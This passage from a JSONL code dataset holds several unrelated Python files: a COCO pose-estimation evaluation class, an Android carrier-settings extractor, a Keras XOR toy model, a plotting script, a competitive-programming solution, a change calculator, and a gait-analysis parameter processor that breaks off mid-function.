'keyword_', 'id', 'name')\n output_data_sets = {'keyword_data': summary_data, 'movie_keyword_relation': relationship}\n for key, value in output_data_sets.items():\n clean_data_dict[key] = value\n else:\n clean_data_dict[data_names[i]] = raw_data\n for key, value in clean_data_dict.items():\n save_file = r'{}\\{}'.format(output_path, key + '.csv')\n value.to_csv(save_file, index=False)\n\nif __name__ == '__main__':\n main()","sub_path":"data analysis/data manipulation.py","file_name":"data 
manipulation.py","file_ext":"py","file_size_in_byte":6532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"635074355","text":"# ------------------------------------------------------------------------------\n# Copyright (c) Microsoft\n# Licensed under the MIT License.\n# The code is based on HigherHRNet-Human-Pose-Estimation and cocoapi.\n# (https://github.com/HRNet/HigherHRNet-Human-Pose-Estimation)\n# (https://github.com/cocodataset/cocoapi)\n# Modified by Zigang Geng (aa397601@mail.ustc.edu.cn).\n# ------------------------------------------------------------------------------\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom collections import defaultdict\nimport logging\nimport os\nimport os.path\n\nimport cv2\nimport json_tricks as json\nimport numpy as np\nimport pickle\nfrom torch.utils.data import Dataset\n\nfrom pycocotools.cocoeval import COCOeval\nfrom utils import zipreader\nfrom .COCODataset import CocoDataset\n\nlogger = logging.getLogger(__name__)\n\n\nclass COCOeval_Rescore_Data(COCOeval):\n def __init__(self, cocoGt=None, cocoDt=None, iouType='segm'):\n COCOeval.__init__(self, cocoGt, cocoDt, iouType)\n self.summary = [['pose', 'pose_heatval', 'oks']]\n \n def evaluateImg(self, imgId, catId, aRng, maxDet):\n '''\n get predicted pose and oks score for single category and image\n change self.summary\n '''\n p = self.params\n if p.useCats:\n gt = self._gts[imgId,catId]\n dt = self._dts[imgId,catId]\n else:\n gt = [_ for cId in p.catIds for _ in self._gts[imgId,cId]]\n dt = [_ for cId in p.catIds for _ in self._dts[imgId,cId]]\n if len(gt) == 0 and len(dt) ==0:\n return None\n \n for g in gt:\n if g['ignore'] or (g['area']<aRng[0] or g['area']>aRng[1]):\n g['_ignore'] = 1\n else:\n g['_ignore'] = 0\n\n # sort dt highest score first, sort gt ignore last\n gtind = np.argsort([g['_ignore'] for g in gt], kind='mergesort')\n gt = [gt[i] for i in gtind]\n dtind = np.argsort([-d['score'] for d in dt], kind='mergesort')\n dt = [dt[i] for i in dtind[0:maxDet]]\n # load computed ious\n ious = self.ious[imgId, catId][:, gtind] if len(self.ious[imgId, catId]) > 0 else self.ious[imgId, catId]\n\n gtIg = np.array([g['_ignore'] for g in gt])\n if not len(ious)==0:\n for dind, d in enumerate(dt):\n # information about best match so far (m=-1 -> unmatched)\n iou = 0\n m = -1\n for gind, g in enumerate(gt):\n #if not iscrowd[gind]:\n # continue\n # if dt matched to reg gt, and on ignore gt, stop\n if m>-1 and gtIg[m]==0 and gtIg[gind]==1:\n break\n # continue to next gt unless better match made\n if ious[dind,gind] < iou:\n continue\n # if match successful and best so far, store appropriately\n iou=ious[dind,gind]\n m=gind\n \n dtkeypoint = np.array(d['keypoints']).reshape((17,3))\n self.summary.append([dtkeypoint[:,:2], dtkeypoint[:,2:], iou])\n\n def dumpdataset(self, data_file):\n pickle.dump(self.summary, open(data_file, 'wb'))\n\n\nclass CocoDatasetGetScoreData(CocoDataset):\n def __init__(self, root, dataset, data_format, num_joints, get_rescore_data, transform=None,\n target_transform=None, bbox_file=None):\n CocoDataset.__init__(self, root, dataset, data_format, num_joints, get_rescore_data, transform=None,\n target_transform=None, bbox_file=None)\n\n def evaluate(self, cfg, preds, scores, output_dir, tag,\n *args, **kwargs):\n '''\n Perform evaluation on COCO keypoint task\n :param cfg: cfg dictionary\n :param preds: prediction\n :param output_dir: output directory\n :param args: 
\n :param kwargs: \n :return: \n '''\n res_folder = os.path.join(output_dir, 'results')\n if not os.path.exists(res_folder):\n os.makedirs(res_folder)\n res_file = os.path.join(\n res_folder, 'keypoints_%s_results.json' % (self.dataset+tag))\n\n # preds is a list of: image x person x (keypoints)\n # keypoints: num_joints * 4 (x, y, score, tag)\n kpts = defaultdict(list)\n for idx, _kpts in enumerate(preds):\n img_id = self.ids[idx]\n file_name = self.coco.loadImgs(img_id)[0]['file_name']\n for idx_kpt, kpt in enumerate(_kpts):\n area = (np.max(kpt[:, 0]) - np.min(kpt[:, 0])) * \\\n (np.max(kpt[:, 1]) - np.min(kpt[:, 1]))\n kpt = self.processKeypoints(kpt)\n\n kpts[int(file_name[-16:-4])].append(\n {\n 'keypoints': kpt[:, 0:3],\n 'score': scores[idx][idx_kpt],\n 'image': int(file_name[-16:-4]),\n 'area': area\n }\n )\n\n # rescoring and oks nms\n oks_nmsed_kpts = []\n # image x person x (keypoints)\n for img in kpts.keys():\n # person x (keypoints)\n img_kpts = kpts[img]\n # person x (keypoints)\n # do not use nms, keep all detections\n keep = []\n if len(keep) == 0:\n oks_nmsed_kpts.append(img_kpts)\n else:\n oks_nmsed_kpts.append([img_kpts[_keep] for _keep in keep])\n\n self._write_coco_keypoint_results(\n oks_nmsed_kpts, res_file\n )\n\n if 'test' not in self.dataset:\n self._do_python_keypoint_eval(\n cfg.RESCORE.DATA_FILE, res_file, res_folder\n )\n\n else:\n return {'Null': 0}, 0\n\n def _do_python_keypoint_eval(self, data_file, res_file, res_folder):\n coco_dt = self.coco.loadRes(res_file)\n coco_eval = COCOeval_Rescore_Data(self.coco, coco_dt, 'keypoints')\n coco_eval.params.useSegm = None\n coco_eval.evaluate()\n coco_eval.dumpdataset(data_file)","sub_path":"pose_estimation/lib/dataset/COCODatasetGetScoreData.py","file_name":"COCODatasetGetScoreData.py","file_ext":"py","file_size_in_byte":6216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"511103059","text":"#!/usr/bin/env python3\n\nfrom collections import OrderedDict\nfrom glob import glob\nfrom itertools import product\nimport os.path\nimport sys\nfrom xml.etree import ElementTree as ET\nfrom xml.sax.saxutils import escape, quoteattr\n\nfrom carriersettings_pb2 import CarrierList, CarrierSettings, \\\n MultiCarrierSettings\nfrom vendor.carrierId_pb2 import CarrierList as CarrierIdList\n\npb_path = sys.argv[1]\n\ncarrier_id_list = CarrierIdList()\ncarrier_attribute_map = {}\nwith open('carrier_list.pb', 'rb') as pb:\n carrier_id_list.ParseFromString(pb.read())\nfor carrier_id_obj in carrier_id_list.carrier_id:\n for carrier_attribute in carrier_id_obj.carrier_attribute:\n for carrier_attributes in product(*(\n (s.lower() for s in getattr(carrier_attribute, i) or [''])\n for i in [\n 'mccmnc_tuple', 'imsi_prefix_xpattern', 'spn', 'plmn',\n 'gid1', 'gid2', 'preferred_apn', 'iccid_prefix',\n 'privilege_access_rule',\n ]\n )):\n carrier_attribute_map[carrier_attributes] = \\\n carrier_id_obj.canonical_id\n\ncarrier_list = CarrierList()\nall_settings = {}\nfor filename in glob(os.path.join(pb_path, '*.pb')):\n with open(filename, 'rb') as pb:\n if os.path.basename(filename) == 'carrier_list.pb':\n carrier_list.ParseFromString(pb.read())\n elif os.path.basename(filename) == 'others.pb':\n settings = MultiCarrierSettings()\n settings.ParseFromString(pb.read())\n for setting in settings.setting:\n assert setting.canonicalName not in all_settings\n all_settings[setting.canonicalName] = setting\n else:\n setting = CarrierSettings()\n setting.ParseFromString(pb.read())\n assert 
setting.canonicalName not in all_settings\n all_settings[setting.canonicalName] = setting\n\n\n# Unfortunately, python processors like xml and lxml, as well as command-line\n# utilities like tidy, do not support the exact style used by AOSP for\n# apns-full-conf.xml:\n#\n# * indent: 2 spaces\n# * attribute indent: 4 spaces\n# * blank lines between elements\n# * attributes after first indented on separate lines\n# * closing tags of multi-line elements on separate, unindented lines\n#\n# Therefore, we build the file without using an XML processor.\n\n\nclass ApnElement:\n def __init__(self, apn, carrier_id):\n self.apn = apn\n self.carrier_id = carrier_id\n self.attributes = OrderedDict()\n self.add_attributes()\n\n def add_attribute(self, key, field=None, value=None):\n if value is not None:\n self.attributes[key] = value\n else:\n if field is None:\n field = key\n if self.apn.HasField(field):\n enum_type = self.apn.DESCRIPTOR.fields_by_name[field].enum_type\n value = getattr(self.apn, field)\n if enum_type is None:\n if isinstance(value, bool):\n self.attributes[key] = str(value).lower()\n else:\n self.attributes[key] = str(value)\n else:\n self.attributes[key] = \\\n enum_type.values_by_number[value].name\n\n def add_attributes(self):\n try:\n self.add_attribute(\n 'carrier_id',\n value=str(carrier_attribute_map[(\n self.carrier_id.mccMnc,\n self.carrier_id.imsi,\n self.carrier_id.spn.lower(),\n '',\n self.carrier_id.gid1.lower(),\n self.carrier_id.gid2.lower(),\n '',\n '',\n '',\n )])\n )\n except KeyError:\n pass\n self.add_attribute('mcc', value=self.carrier_id.mccMnc[:3])\n self.add_attribute('mnc', value=self.carrier_id.mccMnc[3:])\n self.add_attribute('apn', 'value')\n self.add_attribute('proxy')\n self.add_attribute('port')\n self.add_attribute('mmsc')\n self.add_attribute('mmsproxy', 'mmscProxy')\n self.add_attribute('mmsport', 'mmscProxyPort')\n self.add_attribute('user')\n self.add_attribute('password')\n self.add_attribute('server')\n self.add_attribute('authtype')\n self.add_attribute(\n 'type',\n value=','.join(\n apn.DESCRIPTOR.fields_by_name[\n 'type'\n ].enum_type.values_by_number[i].name\n for i in self.apn.type\n ).lower(),\n )\n self.add_attribute('protocol')\n self.add_attribute('roaming_protocol', 'roamingProtocol')\n self.add_attribute('carrier_enabled', 'carrierEnabled')\n self.add_attribute('bearer_bitmask', 'bearerBitmask')\n self.add_attribute('profile_id', 'profileId')\n self.add_attribute('modem_cognitive', 'modemCognitive')\n self.add_attribute('max_conns', 'maxConns')\n self.add_attribute('wait_time', 'waitTime')\n self.add_attribute('max_conns_time', 'maxConnsTime')\n self.add_attribute('mtu')\n mvno = self.carrier_id.WhichOneof('mvno')\n if mvno:\n self.add_attribute(\n 'mvno_type',\n value='gid' if mvno.startswith('gid') else mvno,\n )\n self.add_attribute(\n 'mvno_match_data',\n value=getattr(self.carrier_id, mvno),\n )\n self.add_attribute('apn_set_id', 'apnSetId')\n # No source for integer carrier_id?\n self.add_attribute('skip_464xlat', 'skip464Xlat')\n self.add_attribute('user_visible', 'userVisible')\n self.add_attribute('user_editable', 'userEditable')\n\n\ndef indent(elem, level=0):\n \"\"\"Based on https://effbot.org/zone/element-lib.htm#prettyprint\"\"\"\n i = \"\\n\" + level * \" \"\n if len(elem):\n if not elem.text or not elem.text.strip():\n elem.text = i + \" \"\n if not elem.tail or not elem.tail.strip():\n elem.tail = i\n for elem in elem:\n indent(elem, level + 1)\n if not elem.tail or not elem.tail.strip():\n elem.tail = i\n else:\n if 
level and (not elem.tail or not elem.tail.strip()):\n elem.tail = i\n\n\ncarrier_config_root = ET.Element('carrier_config_list')\n\nwith open('apns-full-conf.xml', 'w', encoding='utf-8') as f:\n f.write('<?xml version=\"1.0\" encoding=\"utf-8\"?>\\n\\n')\n f.write('<apns version=\"8\">\\n\\n')\n\n version_suffix = all_settings['default'].version % 1000000000\n for entry in carrier_list.entry:\n setting = all_settings[entry.canonicalName]\n for apn in setting.apns.apn:\n apn_element = ApnElement(apn, entry.carrierId)\n f.write(' <apn carrier={}\\n'.format(quoteattr(apn.name)))\n for key, value in apn_element.attributes.items():\n f.write(' {}={}\\n'.format(escape(key), quoteattr(value)))\n f.write(' />\\n\\n')\n\n carrier_config_element = ET.SubElement(\n carrier_config_root,\n 'carrier_config',\n )\n carrier_config_element.set('mcc', entry.carrierId.mccMnc[:3])\n carrier_config_element.set('mnc', entry.carrierId.mccMnc[3:])\n for field in ['spn', 'imsi', 'gid1', 'gid2']:\n if entry.carrierId.HasField(field):\n carrier_config_element.set(\n field,\n getattr(entry.carrierId, field),\n )\n\n # Add version key composed of canonical name and versions\n carrier_config_subelement = ET.SubElement(\n carrier_config_element,\n 'string'\n )\n carrier_config_subelement.set('name', 'carrier_config_version_string')\n carrier_config_subelement.text = '{}-{}.{}'.format(\n setting.canonicalName,\n setting.version,\n version_suffix\n )\n\n for config in setting.configs.config:\n value_type = config.WhichOneof('value')\n if value_type == 'textValue':\n carrier_config_subelement = ET.SubElement(\n carrier_config_element,\n 'string',\n )\n carrier_config_subelement.set('name', config.key)\n carrier_config_subelement.text = getattr(config, value_type)\n elif value_type == 'intValue':\n carrier_config_subelement = ET.SubElement(\n carrier_config_element,\n 'int',\n )\n carrier_config_subelement.set('name', config.key)\n carrier_config_subelement.set(\n 'value',\n str(getattr(config, value_type)),\n )\n elif value_type == 'longValue':\n carrier_config_subelement = ET.SubElement(\n carrier_config_element,\n 'long',\n )\n carrier_config_subelement.set('name', config.key)\n carrier_config_subelement.set(\n 'value',\n str(getattr(config, value_type)),\n )\n elif value_type == 'boolValue':\n carrier_config_subelement = ET.SubElement(\n carrier_config_element,\n 'boolean',\n )\n carrier_config_subelement.set('name', config.key)\n carrier_config_subelement.set(\n 'value',\n str(getattr(config, value_type)).lower(),\n )\n elif value_type == 'textArray':\n carrier_config_subelement = ET.SubElement(\n carrier_config_element,\n 'string-array',\n )\n carrier_config_subelement.set('name', config.key)\n carrier_config_subelement.set(\n 'num',\n str(len(getattr(config, value_type).item)),\n )\n for value in getattr(config, value_type).item:\n carrier_config_item = ET.SubElement(\n carrier_config_subelement,\n 'item',\n )\n carrier_config_item.set('value', value)\n elif value_type == 'intArray':\n carrier_config_subelement = ET.SubElement(\n carrier_config_element,\n 'int-array',\n )\n carrier_config_subelement.set('name', config.key)\n carrier_config_subelement.set(\n 'num',\n str(len(getattr(config, value_type).item)),\n )\n for value in getattr(config, value_type).item:\n carrier_config_item = ET.SubElement(\n carrier_config_subelement,\n 'item',\n )\n carrier_config_item.set('value', str(value))\n else:\n raise TypeError(\"Unknown value type: {}\".format(value_type))\n\n f.write('</apns>\\n')\n\nindent(carrier_config_root)\ncarrier_config_tree = ET.ElementTree(carrier_config_root)\ncarrier_config_tree.write('vendor.xml', encoding='utf-8', xml_declaration=True)\n\n# Test XML 
parsing.\nET.parse('apns-full-conf.xml')\nET.parse('vendor.xml')\n","sub_path":"carriersettings_extractor.py","file_name":"carriersettings_extractor.py","file_ext":"py","file_size_in_byte":11482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"408958203","text":"from sklearn.svm import LinearSVC, SVC\nfrom sklearn.metrics import accuracy_score, r2_score\nimport numpy as np\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\n\n#1. data \nx_data = [[0,0],[1,0],[0,1],[1,1]]\ny_data = [0,1,1,0]\n\n#2. model\nmodel = Sequential()\nmodel.add(Dense(4, input_shape=(2,)))\nmodel.add(Dense(20, activation='relu'))\n# model.add(Dense(10, activation='relu'))\nmodel.add(Dense(1, activation='sigmoid'))\n\n#3. training\nmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['acc'])\nmodel.fit(x_data, y_data, batch_size=1, epochs=100)\n\n#4. evaluate, predict\ny_predict = model.predict(x_data)\n\nprint(x_data,\"predictions for x_data\",y_predict)\n\n# acc = accuracy_score(y_data, y_predict)\n# print(\"acc: \", acc)\n\nscore = model.evaluate(x_data, y_data)\nprint(\"evaluates: \", score)","sub_path":"ml/m04_xor3_keras2.py","file_name":"m04_xor3_keras2.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"247854220","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pdb\nfrom matplotlib.backends.backend_pdf import PdfPages\n\nz = np.load('mat_240.npy')\n\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\n# mat_240 is 50Hz\nfig, ax1 = plt.subplots()\n# pdb.set_trace()\nt = np.linspace(0,z.shape[0]/100,z.shape[0])\nax1.plot(t, 1./z[:,1]*30*1e6,'.')\nplt.ylabel('RPM')\nplt.xlabel('Time [s]')\nplt.grid()\nax2 = ax1.twinx()\nax2.plot(t, z[:,0],'r.-')\nplt.ylabel('cmd')\nplt.xlim([0, 68])\n# z = np.polyfit(rpm,z[:,2],2)\n# rpm_fit = np.linspace(2000,5500,100)\n# p = np.poly1d(z)\n# print z\n# plt.plot(rpm_fit,p(rpm_fit),'--r')\nplt.tight_layout()\npp = PdfPages('response.pdf')\npp.savefig(fig)\nfig.savefig('response.png')\npp.close()\nplt.show()\n","sub_path":"post_proc_mat.py","file_name":"post_proc_mat.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"173382465","text":"import sys\nsys.setrecursionlimit(1 << 25)\nread = sys.stdin.readline\nra = range\nenu = enumerate\n\n\ndef exit(*argv, **kwarg):\n print(*argv, **kwarg)\n sys.exit()\n\n\ndef mina(*argv, sub=1): return list(map(lambda x: x - sub, argv))\n# Subtract sub from every element passed in. Unpack a list with * when calling.\n\n\ndef a_int(): return int(read())\n\n\ndef ints(): return list(map(int, read().split()))\n\n\ndef read_col(H):\n '''H is number of rows\n For input given as columns, e.g. column A and column B\n ex1)A,B=read_col(H) ex2) A,=read_col(H) #single-column case'''\n ret = []\n for _ in range(H):\n ret.append(list(map(int, read().split())))\n return tuple(map(list, zip(*ret)))\n\n\ndef read_tuple(H):\n '''H is number of rows'''\n ret = []\n for _ in range(H):\n ret.append(tuple(map(int, read().split())))\n return ret\n\n\ndef read_matrix(H):\n '''H is number of rows'''\n ret = []\n for _ in range(H):\n ret.append(list(map(int, read().split())))\n return ret\n # return [list(map(int, read().split())) for _ in range(H)] # list comprehensions are slow on PyPy\n\n\nMOD = 10**9 + 7\nINF = 2**31 # 2147483648 > 10**9\n# default import\nfrom collections import defaultdict, Counter, deque\nfrom operator import 
itemgetter, xor, add\nfrom itertools import product, permutations, combinations\nfrom bisect import bisect_left, bisect_right # , insort_left, insort_right\nfrom functools import reduce\n\nX, K, D = ints()\n# OK to treat X as positive from the start (the problem is symmetric)\nif X < 0:\n X = -X\n\n# Case: we never bounce back and forth around zero\nif X >= K * D:\n exit(X - K * D)\n\n# Case: we end up bouncing back and forth around zero\nXX = X % D # nearest reachable point to 0 on the positive side\nK -= X // D # remaining moves\n# print(XX, K)\n\nprint(XX if K & 1 == 0 else -(XX - D))\n","sub_path":"contests/abc175/c/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"371336664","text":"\"\"\"\nUser enters cost, amount of money given. Calculate change in quarters, dimes, nickels, pennies\n\"\"\"\n\n\ncost = float(input(\"What is the cost of the product? \"))\ntender = float(input(\"How much money are you giving to buy the product? \"))\n\nwhile tender < cost:\n print(\"You still owe $\" + \"%.2f\" % (cost - tender))\n tender += float(input(\"How much more money are you giving? \"))\n\nchange = int(round((tender - cost) * 100))\nquart = 0\ndime = 0\nnickel = 0\npenn = 0\n\nif change >= 25:\n quart = int(change / 25)\n change = change % 25\n \nif change >= 10:\n dime = int(change / 10)\n change = change % 10\n \nif change >= 5:\n nickel = int(change / 5)\n change = change % 5\n \nif change >= 1:\n penn = change\n\nprint(\"Change: %d quarter(s), %d dime(s), %d nickel(s), %d penny(ies)\" % (quart, dime, nickel, penn))\n","sub_path":"Numbers/change.py","file_name":"change.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"449752853","text":"import pandas as pd\nimport numpy as np\nfrom numpy.core.umath_tests import inner1d\nimport matplotlib.pyplot as plt\nfrom const import TRIAL_NAMES, PLATE_SAMPLE_RATE, MOCAP_SAMPLE_RATE, HAISHENG_SENSOR_SAMPLE_RATE, \\\n FOOT_SENSOR_BROKEN_SUBS\nimport xlrd\nfrom numpy.linalg import norm\nfrom StrikeOffDetectorIMU import StrikeOffDetectorIMU, StrikeOffDetectorIMUFilter\n\n\nclass ParamProcessor:\n def __init__(self, sub_name, readme_xls, trials, plot_strike_off=False, check_steps=False,\n initialize_100Hz=True, initialize_200Hz=True):\n self._sub_name = sub_name\n readme_sheet = xlrd.open_workbook(readme_xls).sheet_by_index(0)\n self.__weight = readme_sheet.cell_value(17, 1) # in kilos\n self.__height = readme_sheet.cell_value(18, 1) # in meters\n self.__plot_strike_off = plot_strike_off\n self.__check_steps = check_steps\n self.__initialize_100Hz = initialize_100Hz\n self.__initialize_200Hz = initialize_200Hz\n\n self._trials = list(trials)\n # remove static trials\n if TRIAL_NAMES[0] in self._trials:\n self._trials.remove(TRIAL_NAMES[0])\n\n def start_initalization(self, path):\n print('\\n' + self._sub_name)\n fre_100_path = path + '\\\\' + self._sub_name + '\\\\100Hz\\\\'\n fre_200_path = path + '\\\\' + self._sub_name + '\\\\200Hz\\\\'\n\n if self.__initialize_100Hz:\n self.static_data_df = pd.read_csv(fre_100_path + TRIAL_NAMES[0] + '.csv', index_col=False)\n for trial_name in self._trials:\n print('\\n' + trial_name + ' trial')\n self._current_trial = trial_name\n # initialize 100 Hz parameter\n print('100Hz')\n self._current_fre = 100\n gait_data_100_df = pd.read_csv(fre_100_path + trial_name + '.csv', index_col=False)\n trial_param_df_100 = self.init_trial_params(gait_data_100_df, HAISHENG_SENSOR_SAMPLE_RATE)\n self.__save_data(fre_100_path, trial_name, trial_param_df_100)\n # plt.show()\n\n if self.__initialize_200Hz:\n self.static_data_df = pd.read_csv(fre_200_path + TRIAL_NAMES[0] + '.csv', index_col=False)\n for trial_name in self._trials:\n print('\\n' + trial_name + ' trial')\n 
self._current_trial = trial_name\n # initialize 200 Hz parameter\n print('200Hz')\n self._current_fre = 200\n gait_data_200_df = pd.read_csv(fre_200_path + trial_name + '.csv', index_col=False)\n trial_param_df_200 = self.init_trial_params(gait_data_200_df, MOCAP_SAMPLE_RATE)\n self.__save_data(fre_200_path, trial_name, trial_param_df_200)\n # plt.show()\n\n @staticmethod\n def resample_steps(steps_1000, sample_fre):\n ratio = int(1000 / sample_fre)\n steps_resampled = []\n for step in steps_1000:\n step_resampled = [round(step[0] / ratio), round(step[1] / ratio)]\n steps_resampled.append(step_resampled)\n return steps_resampled\n\n def init_trial_params(self, gait_data_df, sensor_sampling_rate):\n # get strikes and offs\n l_strikes, l_offs = self.get_strike_off(gait_data_df, plate=1)\n r_strikes, r_offs = self.get_strike_off(gait_data_df, plate=2)\n self.check_strikes_offs(-gait_data_df['f_1_z'], l_strikes, l_offs, self._current_trial + ' left foot')\n self.check_strikes_offs(-gait_data_df['f_2_z'], r_strikes, r_offs, self._current_trial + ' right foot')\n\n # get steps\n l_steps = self.get_legal_steps(l_strikes, l_offs, 'l', gait_data_df=gait_data_df)\n r_steps = self.get_legal_steps(r_strikes, r_offs, 'r', gait_data_df=gait_data_df)\n\n # get FPA and trunk angles\n FPA_all = self.get_FPA_all(gait_data_df) # FPA of all the samples\n trunk_ml_angle, trunk_ap_angle = self.get_trunk_angles(gait_data_df)\n # self.check_trunk_angles(trunk_ml_angle, trunk_ap_angle)\n param_data = np.column_stack([trunk_ap_angle, trunk_ml_angle, l_strikes, r_strikes, l_offs, r_offs, FPA_all])\n param_data_df = pd.DataFrame(param_data)\n param_data_df.columns = ['trunk_ap_angle', 'trunk_ml_angle', 'l_strikes', 'r_strikes', 'l_offs', 'r_offs',\n 'l_FPA', 'r_FPA']\n param_data_df.insert(0, 'marker_frame', gait_data_df['marker_frame'])\n\n if self._sub_name not in FOOT_SENSOR_BROKEN_SUBS:\n # get strikes and offs from IMU data\n estimated_strikes_lfilter, estimated_offs_lfilter = self.get_strike_off_from_imu_lfilter(\n gait_data_df, param_data_df, sensor_sampling_rate, check_strike_off=True,\n plot_the_strike_off=self.__plot_strike_off)\n param_data_df.insert(len(param_data_df.columns), 'strikes_IMU_lfilter', estimated_strikes_lfilter)\n param_data_df.insert(len(param_data_df.columns), 'offs_IMU_lfilter', estimated_offs_lfilter)\n l_FPA_steps = self.get_FPA_steps(gait_data_df, FPA_all[:, 0], l_steps)\n r_FPA_steps = self.get_FPA_steps(gait_data_df, FPA_all[:, 1], r_steps)\n self.insert_param_data(param_data_df, l_FPA_steps, 'l_FPA_steps')\n self.insert_param_data(param_data_df, r_FPA_steps, 'r_FPA_steps')\n\n return param_data_df\n\n @staticmethod\n def check_loading_rate_all(l_loading_rate):\n plt.figure()\n plt.plot(l_loading_rate)\n\n @staticmethod\n def get_strike_off(gait_data_df, plate, threshold=20, comparison_len=4):\n if plate == 1:\n force = gait_data_df[['f_1_x', 'f_1_y', 'f_1_z']].values\n elif plate == 2:\n force = gait_data_df[['f_2_x', 'f_2_y', 'f_2_z']].values\n else:\n raise ValueError('Wrong plate number')\n\n force_norm = norm(force, axis=1)\n data_len = force_norm.shape[0]\n strikes, offs = np.zeros(data_len, dtype=np.int8), np.zeros(data_len, dtype=np.int8)\n i_sample = 0\n # go to the first stance phase\n while i_sample < data_len and force_norm[i_sample] < 300:\n i_sample += 1\n swing_phase = False\n while i_sample < data_len - comparison_len:\n # for swing phase\n if swing_phase:\n while i_sample < data_len - comparison_len:\n i_sample += 1\n lower_than_threshold_num = len(\n 
np.where(force_norm[i_sample:i_sample + comparison_len] < threshold)[0])\n if lower_than_threshold_num >= round(0.8 * comparison_len):\n continue\n else:\n strikes[i_sample + round(0.8 * comparison_len) - 1] = 1\n swing_phase = False\n break\n # for stance phase\n else:\n while i_sample < data_len and force_norm[i_sample] > 300: # go to the next stance phase\n i_sample += 1\n while i_sample < data_len - comparison_len:\n i_sample += 1\n lower_than_threshold_num = len(\n np.where(force_norm[i_sample:i_sample + comparison_len] < threshold)[0])\n if lower_than_threshold_num >= round(0.8 * comparison_len):\n offs[i_sample + round(0.2 * comparison_len)] = 1\n swing_phase = True\n break\n return strikes, offs\n\n def get_strike_off_1000(self, gait_data_df, plate_data_1000, sensor_sampling_rate, threshold=20):\n force = plate_data_1000[['f_1_x', 'f_1_y', 'f_1_z']].values\n force_norm = norm(force, axis=1)\n strikes, offs = self.get_raw_strikes_offs(force_norm, threshold, comparison_len=20)\n self.check_strikes_offs(force_norm, strikes, offs)\n\n # distribute strikes offs to left and right foot\n data_len = len(strikes)\n ratio = sensor_sampling_rate / PLATE_SAMPLE_RATE\n\n l_strikes, r_strikes = np.zeros(data_len), np.zeros(data_len)\n l_offs, r_offs = np.zeros(data_len), np.zeros(data_len)\n for i_sample in range(data_len):\n if strikes[i_sample] == 1:\n l_heel_y = gait_data_df.loc[round(i_sample * ratio), 'LFCC_y']\n r_heel_y = gait_data_df.loc[round(i_sample * ratio), 'RFCC_y']\n if l_heel_y == 0 or r_heel_y == 0:\n raise ValueError('Marker missing')\n if l_heel_y > r_heel_y:\n l_strikes[i_sample] = 1\n else:\n r_strikes[i_sample] = 1\n if offs[i_sample] == 1:\n l_heel_y = gait_data_df.loc[round(i_sample * ratio), 'LFCC_y']\n r_heel_y = gait_data_df.loc[round(i_sample * ratio), 'RFCC_y']\n if l_heel_y == 0 or r_heel_y == 0:\n raise ValueError('Marker missing')\n if l_heel_y < r_heel_y:\n l_offs[i_sample] = 1\n else:\n r_offs[i_sample] = 1\n return l_strikes, r_strikes, l_offs, r_offs\n\n def check_strikes_offs(self, force_norm, strikes, offs, title=''):\n strike_indexes = np.where(strikes == 1)[0]\n off_indexes = np.where(offs == 1)[0]\n data_len = min(strike_indexes.shape[0], off_indexes.shape[0])\n\n # check strike off by checking if each strike is followed by a off\n strike_off_detection_flaw = False\n if strike_indexes[0] > off_indexes[0]:\n diffs_0 = np.array(strike_indexes[:data_len]) - np.array(off_indexes[:data_len])\n diffs_1 = np.array(strike_indexes[:data_len - 1]) - np.array(off_indexes[1:data_len])\n else:\n diffs_0 = np.array(off_indexes[:data_len]) - np.array(strike_indexes[:data_len])\n diffs_1 = np.array(off_indexes[:data_len - 1]) - np.array(strike_indexes[1:data_len])\n if np.min(diffs_0) < 0 or np.max(diffs_1) > 0:\n strike_off_detection_flaw = True\n\n try:\n if strike_off_detection_flaw:\n raise ValueError('For trial {trial_name}, strike off detection result are wrong.'.format(\n trial_name=self._current_trial))\n if self.__plot_strike_off:\n raise ValueError\n except ValueError as value_error:\n if len(value_error.args) != 0:\n print(value_error.args[0])\n plt.figure()\n plt.plot(force_norm)\n plt.grid()\n plt.plot(strike_indexes, force_norm[strike_indexes], 'g*')\n plt.plot(off_indexes, force_norm[off_indexes], 'gx')\n plt.title(title)\n\n def get_trunk_angles(self, gait_data_df):\n C7 = gait_data_df[['C7_x', 'C7_y', 'C7_z']].values\n l_PSIS = gait_data_df[['LIPS_x', 'LIPS_y', 'LIPS_z']].values\n r_PSIS = gait_data_df[['RIPS_x', 'RIPS_y', 'RIPS_z']].values\n middle_PSIS 
